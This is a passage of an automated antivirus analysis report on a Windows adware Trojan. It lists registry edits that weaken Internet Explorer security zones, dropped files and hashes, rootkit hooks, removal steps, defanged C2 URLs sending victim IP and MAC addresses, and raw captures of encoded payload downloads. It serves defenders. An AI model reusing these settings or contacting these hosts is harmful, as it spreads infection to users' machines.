[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\jwxf]
"start.bat" = "start"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process lgsoyx.exe:3824 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 21 DB A2 3F 50 0E C8 7F DF 1E 7E 79 39 36 07"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"

The process shock.exe:3848 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D9 84 84 31 6F 5C 02 36 47 10 EF 6D 97 A1 DC"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"

[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"

[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"

Dropped PE files

MD5	File path
55a3259a59e3c8da70c31447ba869226	c:\WINDOWS\Ymb\deskico\desk.exe
aa6a8b0804c64d9a744478aba1812bf3	c:\WINDOWS\Ymb\lgsoyx.exe
a9e6210e1512d80655643408876f5d7c	c:\WINDOWS\Ymb\sys32\shock.dll
e894852596c57675446919411d8fc600	c:\WINDOWS\Ymb\sys32\shock.exe
9d7623b9a5040adb22ce80f31561ee9a	c:\WINDOWS\Ymb\sys32\urlnav.dll
52b42aa6637c5e7e7a1fa38d8ad3147e	c:\WINDOWS\jwxf\MainPro.exe
dde8a18d882ec61bffba5ce09fd3ede8	c:\WINDOWS\jwxf\MainProX.exe
99c87fbd1328657083180cc0a1c01d01	c:\WINDOWS\jwxf\yp.exe
4540f263d05608dcd3eb0affc059bac5	c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â»ÃƒÆ’Ã‚Â°Ãƒâ€šÃ‚Â±Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã¢â‚¬Å“ÃƒÆ’Ã…Â½ÃƒÆ’Ã‚ÂÃƒâ€šÃ‚Â·.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÃƒÆ’Ã¢â‚¬Â ÃƒÆ’Ã‚Â¥ÃƒÆ’Ã¢â‚¬Â¦ÃƒÆ’Ã¢â‚¬Â Ãƒâ€šÃ‚Â´ÃƒÆ’Ã‚Â³ÃƒÆ’Ã…â€™ÃƒÆ’Ã‚Â¼.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â ÃƒÆ’Ã‚Â¦Ãƒâ€šÃ‚Â°ÃƒÆ’Ã¢â‚¬ÂÃƒÆ’Ã¢â‚¬â„¢Ãƒâ€šÃ‚Âµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	152808	153088	4.64164	22ced87f8cfbeec19f10ea768b9f5033
.rdata	159744	20275	20480	3.68225	9aea8072fe8459f1fb075382c5799ef0
.data	180224	136672	5120	1.76573	5aafebbc10957e661762e0e7fadc057b
.rsrc	319488	22204	22528	3.49153	0262b31b1b6e8cd4bbbefdfbece199d6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://116.255.243.151/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930
hxxp://saichi.chinacloudapp.cn/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9
hxxp://saichi.chinacloudapp.cn/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1
hxxp://saichi.chinacloudapp.cn/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793
hxxp://saichi.chinacloudapp.cn/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905
hxxp://saichi.chinacloudapp.cn/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9
hxxp://saichi.chinacloudapp.cn/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28
hxxp://saichi.chinacloudapp.cn/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675
hxxp://saichi.chinacloudapp.cn/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/cfg.ini
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/178.ico
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/190.ico
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/184.ico
hxxp://saichi.chinacloudapp.cn/txt/list666_20150402170229.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED
hxxp://log.soomeng.com/deskcount?31252A4A412B46731A5D48327378652739263A700E590D0C4B0822	115.238.251.56
hxxp://sc.p2ptool.com/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9	42.159.29.153
hxxp://plus.zzinfor.cn/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930
hxxp://sc.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9	42.159.29.153
hxxp://pro.52icafe.com/desk/ico/178.ico	61.240.135.44
hxxp://pro.52icafe.com/desk/ico/184.ico	61.240.135.44
hxxp://sc.p2ptool.com/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793	42.159.29.153
hxxp://sc.p2ptool.com/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905	42.159.29.153
hxxp://sc.p2ptool.com/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28	42.159.29.153
hxxp://sc.p2ptool.com/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7	42.159.29.153
hxxp://pro.52icafe.com/desk/ico/190.ico	61.240.135.44
hxxp://pro.52icafe.com/desk/cfg.ini	61.240.135.44
hxxp://sc.p2ptool.com/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1	42.159.29.153
hxxp://sc.p2ptool.com/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675	42.159.29.153

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:21 GMT

Content-Type: text/plain

Content-Length: 1446584

Last-Modified: Thu, 19 Mar 2015 08:35:59 GMT

Connection: close

ETag: "550a8a6f-1612b8"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsE8FbgoIUwpwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKkLylKYwrte9DsLM5FucPllBqI zLItKvUi7rq2FCBqFsOxkH2MqfSv749hq2FwRlndZ00VMyWqzJ/xxHG3la/wJfU2d3xaCkTmuEeFluFMl7A zf9Ag4606gmB7izB9dFky/01vE3mMTazQ2ZSPlrxNrNDZlI Wvl VctcLkkfUPVr1iHDbW5jPiHcrQA6UXLJiZU1pmi12TbqVDGLavoOy6LkFdeCINdwTSf310bhZcnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbXY6hqdQ2cLLUY8yWnM/JlTrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a1nmUDjllD1akaHXA5ON2pzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsK hEEjcLC6cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtP/iDIiRP218TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvLL1A4u6E4zsbEYRbm5uwDsTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9YGRwYXr/5B62mAps5IXtyfE2s0NmUj5a qSnCa1jASD9aoTtByytZbx9M823IT9dsbPFnfe4DzTxNrNDZlI WtwtiPSWquUIj9Gncu4pZZY04U68xaDharxMH0Rg6RlqsTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a2wNi2SICdTxt5q/7FrJX T02MilBFZI5BN89H8kzdMM1wg5aryKKMjyVskrcu QLv2/X5A7iWtC0A4 WNkI2rvOjgcZEb9rUpV5CCcbiObIiZ/ISzb LW24uVO0eYtw3wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uGom3ouwhi4W

<<< skipped >>>

GET /txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:26 GMT

Content-Type: text/plain

Content-Length: 147468

Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT

Connection: close

ETag: "54251ebc-2400c"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIS6yH f1P2yDT7rluBqW2giD4y5yvaIirLOkqQZXa MIbx7i/hpcIaf85gpuidXx1b3p9sFPCdGlfauukL8n3VGGCFZN cmJD9zwQCS9bOJYls9jJp/ca4xNrNDZlI Wvl VctcLkkfUViPPzwwZ7PfTmgOKU172htBHTdk3n91KXxuX TIDozHopeYPJWsYu/iFay305SFOdOmlvW lRm5vx/GiWkbKnm/H8aJaRsqZvlZXSZdb4BrY LTgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a81Tto86JwVL 37qBdmeggXE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvxbsYtAnHS18TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvtkRGcCbGyejNisBIg3iBXMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9WHnXYPNQ7BgK4Gpapi2s/vE2s0NmUj5a qSnCa1jASD9aoTtByytZZN3m8TegecH/B8RyOgTUFbxNrNDZlI WtwtiPSWquUIj9Gncu4pZZYMEiIQPXrL yZ4gEzkJ3TOMTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr

<<< skipped >>>

GET /txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: sc.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 04 Apr 2015 18:54:17 GMT

Content-Type: text/plain

Content-Length: 284000

Last-Modified: Thu, 08 Jan 2015 06:22:57 GMT

Connection: close

ETag: "54ae2241-45560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJZdg29 aaSq5ChwQAReXuq73zZ03xNr0ykJLRLxHX2w 1JsVwVN93iCWjRKtF1lC0OB91q5UCVkX CgSF0zvN CGW9lWuWh/s//zc/3tOzL6RL5Mbk/NQRxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxLBeFOtBcslY/dg0 sDpLF93RaUFkAfs63G0OsoI1dTxYLcfzHzT/d51tXZUFbwHFGXJyfQNpBOtYm ARi1SoBtib4BGLVKgG0DV4qTUdhfmSJDFWoq8VaT6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WtslujPm19qT 7ANpY7NNxGxNrNDZlI WvE2s0NmUj5axVTR1yl7Wh4SFW6pDBLFWHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuoW8230dz3CcTazQ2ZSPlrITDcdtcg4PHE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr2ZKM DeF7JAizyarcgVRXzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVJ0zS6tvj8Khj ky0f66t xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWx KJjsrllxMXn TkM1wXQMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWPTHC32lP2yiKbSD/GqSfVrE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWsfHQ1j7MMGpL7AhrIhxwHxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI 